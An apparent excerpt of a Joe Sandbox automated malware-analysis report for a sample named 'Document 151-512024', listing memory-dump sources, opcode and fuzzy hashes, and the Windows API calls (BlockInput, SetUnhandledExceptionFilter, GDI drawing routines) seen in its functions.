                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ExceptionRaise
                                                                                                    • String ID:
                                                                                                    • API String ID: 3997070919-0
                                                                                                    • Opcode ID: fd46734b3c0728d971371acb840e95f69565ed916dae8a0abb930e6511a072c0
                                                                                                    • Instruction ID: 4129b53cbaf8dc380d0fa05cac0129a1d5956acbf9ec8c11e0356984f3859aac
                                                                                                    • Opcode Fuzzy Hash: fd46734b3c0728d971371acb840e95f69565ed916dae8a0abb930e6511a072c0
                                                                                                    • Instruction Fuzzy Hash: 46B13B32610A099FD719CF28C48ABA57BE0FF45364F25C658E99DCF2A2C335E995CB40
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID: 0-3916222277
                                                                                                    • Opcode ID: 3bb45a4303f96d697611eb1a054e651ecb0c1343c45dd7ee8726b1f9f51a019a
                                                                                                    • Instruction ID: c25b0c869a34fc7ec4272fb5829942442bb4e3054a4df7cd99363a7771ba8503
                                                                                                    • Opcode Fuzzy Hash: 3bb45a4303f96d697611eb1a054e651ecb0c1343c45dd7ee8726b1f9f51a019a
                                                                                                    • Instruction Fuzzy Hash: 8A124E719002299FCF24CF59C881BEEB7B9FF49710F14819AE849EB255DB349E85CB90
                                                                                                    APIs
                                                                                                    • BlockInput.USER32(00000001), ref: 009BEABD
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: BlockInput
                                                                                                    • String ID:
                                                                                                    • API String ID: 3456056419-0
                                                                                                    • Opcode ID: d30140d98065b4526bbcedb4b36d2fed02d706f1ec41ac161547b99ac5037ad0
                                                                                                    • Instruction ID: 011efa68eec7378c099676226c5a4903fa7ea8ee04e5f7dee7c4c2bbe08c595b
                                                                                                    • Opcode Fuzzy Hash: d30140d98065b4526bbcedb4b36d2fed02d706f1ec41ac161547b99ac5037ad0
                                                                                                    • Instruction Fuzzy Hash: 06E01A752102059FC710EF69D904E9AF7EDAF98770F008416FC49C7291DA74E8408B90
                                                                                                    APIs
                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(Function_000209E1,009603EE), ref: 009609DA
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ExceptionFilterUnhandled
                                                                                                    • String ID:
                                                                                                    • API String ID: 3192549508-0
                                                                                                    • Opcode ID: ae7166639fe2dfbe0ad2f75f72cd14754501731f4efd6e79de71f574c6491886
                                                                                                    • Instruction ID: 3e3b1a0021fdac4e0455f52ca58dedb0be26ce1fb0db9b26d9b3ff69ded9527c
                                                                                                    • Opcode Fuzzy Hash: ae7166639fe2dfbe0ad2f75f72cd14754501731f4efd6e79de71f574c6491886
                                                                                                    • Instruction Fuzzy Hash:
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: 0
                                                                                                    • API String ID: 0-4108050209
                                                                                                    • Opcode ID: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
                                                                                                    • Instruction ID: b7dc45643cb03b69436eec85868b596e9b5cc32042b3a229f241cae93a179c80
                                                                                                    • Opcode Fuzzy Hash: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
                                                                                                    • Instruction Fuzzy Hash: 0351687160C7056BDB3885F889DDBBFE3DD9B4234CF180A09D882D7282C619EE41D356
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: e74e723e1b10b4f737bc5b4f3e1880cdb495164f1a979ced087af26ca3c759e8
                                                                                                    • Instruction ID: eed25075793bfaac9838bbc2cabcaf4cd2b6cffabd9800341fbd56a5462f0fd7
                                                                                                    • Opcode Fuzzy Hash: e74e723e1b10b4f737bc5b4f3e1880cdb495164f1a979ced087af26ca3c759e8
                                                                                                    • Instruction Fuzzy Hash: F9321122D2DF414DD7239634CC62336A64DAFB73C5F15D727F82AB99A6EB29C8835100
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: d0cc56e72277920cb601bba5d8274ca54cbd483003ec42f6c2e90c73ae2a9056
                                                                                                    • Instruction ID: 1a4f4d9369a0bd15c64e71c9b08a52c61322a6f004006e1b8f775d0440ce6ced
                                                                                                    • Opcode Fuzzy Hash: d0cc56e72277920cb601bba5d8274ca54cbd483003ec42f6c2e90c73ae2a9056
                                                                                                    • Instruction Fuzzy Hash: BA3249F2A002458FDF24CF6DC89067D7BA9EB45302F28896AD89ADB291D334DD85DB50
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 5f7419a09cb9671f4702a58916c337b73006dbee6964e578bddadca5135f8a41
                                                                                                    • Instruction ID: 0b67c2797b1e3f6b2509bba415352f69094eaba8a884299d5c64a906480081ad
                                                                                                    • Opcode Fuzzy Hash: 5f7419a09cb9671f4702a58916c337b73006dbee6964e578bddadca5135f8a41
                                                                                                    • Instruction Fuzzy Hash: 71229FB0A0460ADFDF14DFA5C881AAEB7B5FF44300F144529E816E7391EB3A9D19CB50
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: a30b4fa3a9b79be2dceaec85ff71b88c63d5e726828cbf101b7ff275f8468dd2
                                                                                                    • Instruction ID: 9cf052970cd93bd9594e785df11eb381aa1ac63f5bb4a40aec5da7ccb267dac4
                                                                                                    • Opcode Fuzzy Hash: a30b4fa3a9b79be2dceaec85ff71b88c63d5e726828cbf101b7ff275f8468dd2
                                                                                                    • Instruction Fuzzy Hash: 1502C5B1E0010AEBDF04EF54D891BAEB7B5FF44300F108569E8169B391EB35AE25CB81
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                                                                    • Instruction ID: b0657710a152b79ddf16ef79a5042816a9330781677344920381bd6b0fdd6980
                                                                                                    • Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                                                                    • Instruction Fuzzy Hash: B49168725080E34EDB2E463E857407EFFE55A923A131E0B9ED4F2CA1C5FE24D964E620
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                                                                    • Instruction ID: c1bdf13b5c52574b7c6bea7a35c39165e6b056be3dd8230e8b40644e9d15024e
                                                                                                    • Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                                                                    • Instruction Fuzzy Hash: A49166722090E34EDB6D467A957403EFFE55A923A231E079ED4F2CA1C5FE24C554E620
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: a738c00bcc8f74fb03a81860ded57d019ff71c5196826eb765bc584429e173fd
                                                                                                    • Instruction ID: dfa41d17e7ddce7ec573d17cac796c0784b096f64cfe34769400a510c51d8014
                                                                                                    • Opcode Fuzzy Hash: a738c00bcc8f74fb03a81860ded57d019ff71c5196826eb765bc584429e173fd
                                                                                                    • Instruction Fuzzy Hash: 92617A7120870956DE349AF88DA5BBFE39CDF8174CF240E1AE883DB281DA19DE42C355
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 6d0f39969167c25b324d4b88f7dbea16d892734d1eefb7b68b3e27a079401667
                                                                                                    • Instruction ID: df1b3e53b5ddc64459d9c510e341c3be7b2ac558e6bcf0ca02d701edf291a91d
                                                                                                    • Opcode Fuzzy Hash: 6d0f39969167c25b324d4b88f7dbea16d892734d1eefb7b68b3e27a079401667
                                                                                                    • Instruction Fuzzy Hash: 5061AB3120870962DF398AE888B1BBFE38CDF8274CF100D5AE943CB2D1EA169D46C311
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                                                                    • Instruction ID: a968ca9348d9eaab747faf79c96d54e132426c60b4a479889ac0a973c1815311
                                                                                                    • Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                                                                    • Instruction Fuzzy Hash: A38186776090E30EDB6D863A853443EFFE55A923A131E079ED4F2CB1C1EE24C654E620
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1226007560.0000000001BC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01BC0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_1bc0000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                                                                    • Instruction ID: a0a34e8de0703d6f5bee53e29b6ee8445065f8d1ca16751a98269e60b85bd991
                                                                                                    • Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                                                                    • Instruction Fuzzy Hash: 8441C471D1051CDBCF48CFADC991AAEBBF1AF88201F548299D516AB345D730AB41DB40
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 0c185aeb3defe19670bb88a16c5a5bb2bb757d63a794ce2b3d19e641f80abd3e
                                                                                                    • Instruction ID: e5d23c754ec63acdad9575942c7867e9d649ca3e765df98f9fa6b63a573b713d
                                                                                                    • Opcode Fuzzy Hash: 0c185aeb3defe19670bb88a16c5a5bb2bb757d63a794ce2b3d19e641f80abd3e
                                                                                                    • Instruction Fuzzy Hash: 5821A5326206158BD728CF79C9226BA73E9E754320F158A2EE4A7C77D0DE75E905CB80
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1226007560.0000000001BC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01BC0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_1bc0000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                                                                    • Instruction ID: fb9e06356aab1335f9b241d9f4a070159f20620181657b455250ddebeb985344
                                                                                                    • Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                                                                    • Instruction Fuzzy Hash: 5D01D279A00109EFCB48DF98C5909AEF7F5FB48710F6081D9D809A7301D730AE41DB80
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1226007560.0000000001BC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01BC0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_1bc0000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                                                                    • Instruction ID: 68f7f2b7df210613baefba03f2e22ed73902e5fa8c3363aa9b59150f612c7822
                                                                                                    • Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                                                                    • Instruction Fuzzy Hash: 09019278A10209EFCB48DF98C5909AEFBF5FB88710F6086D9D819A7751D730AE41DB80
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1226007560.0000000001BC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01BC0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_1bc0000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                                                                    • Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
                                                                                                    • Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                                                                    • Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48
                                                                                                    APIs
                                                                                                    • SetTextColor.GDI32(?,00000000), ref: 009D712F
                                                                                                    • GetSysColorBrush.USER32(0000000F), ref: 009D7160
                                                                                                    • GetSysColor.USER32(0000000F), ref: 009D716C
                                                                                                    • SetBkColor.GDI32(?,000000FF), ref: 009D7186
                                                                                                    • SelectObject.GDI32(?,?), ref: 009D7195
                                                                                                    • InflateRect.USER32(?,000000FF,000000FF), ref: 009D71C0
                                                                                                    • GetSysColor.USER32(00000010), ref: 009D71C8
                                                                                                    • CreateSolidBrush.GDI32(00000000), ref: 009D71CF
                                                                                                    • FrameRect.USER32(?,?,00000000), ref: 009D71DE
                                                                                                    • DeleteObject.GDI32(00000000), ref: 009D71E5
                                                                                                    • InflateRect.USER32(?,000000FE,000000FE), ref: 009D7230
                                                                                                    • FillRect.USER32(?,?,?), ref: 009D7262
                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 009D7284
                                                                                                      • Part of subcall function 009D73E8: GetSysColor.USER32(00000012), ref: 009D7421
                                                                                                      • Part of subcall function 009D73E8: SetTextColor.GDI32(?,?), ref: 009D7425
                                                                                                      • Part of subcall function 009D73E8: GetSysColorBrush.USER32(0000000F), ref: 009D743B
                                                                                                      • Part of subcall function 009D73E8: GetSysColor.USER32(0000000F), ref: 009D7446
                                                                                                      • Part of subcall function 009D73E8: GetSysColor.USER32(00000011), ref: 009D7463
                                                                                                      • Part of subcall function 009D73E8: CreatePen.GDI32(00000000,00000001,00743C00), ref: 009D7471
                                                                                                      • Part of subcall function 009D73E8: SelectObject.GDI32(?,00000000), ref: 009D7482
                                                                                                      • Part of subcall function 009D73E8: SetBkColor.GDI32(?,00000000), ref: 009D748B
                                                                                                      • Part of subcall function 009D73E8: SelectObject.GDI32(?,?), ref: 009D7498
                                                                                                      • Part of subcall function 009D73E8: InflateRect.USER32(?,000000FF,000000FF), ref: 009D74B7
                                                                                                      • Part of subcall function 009D73E8: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 009D74CE
                                                                                                      • Part of subcall function 009D73E8: GetWindowLongW.USER32(00000000,000000F0), ref: 009D74DB
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                                                                                                    • String ID:
                                                                                                    • API String ID: 4124339563-0
                                                                                                    • Opcode ID: 8391b7afb35c8f2476d446a75097af43ca545350b058ea6573142f75d4451fe6
                                                                                                    • Instruction ID: 2d98697e88659a023509093ade8ea13a761fed7a04359f9d02de4e6655f1eaed
                                                                                                    • Opcode Fuzzy Hash: 8391b7afb35c8f2476d446a75097af43ca545350b058ea6573142f75d4451fe6
                                                                                                    • Instruction Fuzzy Hash: 0AA1B4B205D312BFDB009FA0DC48E5BBBA9FB49321F104B1AFA62961E1D734D984DB51
                                                                                                    APIs
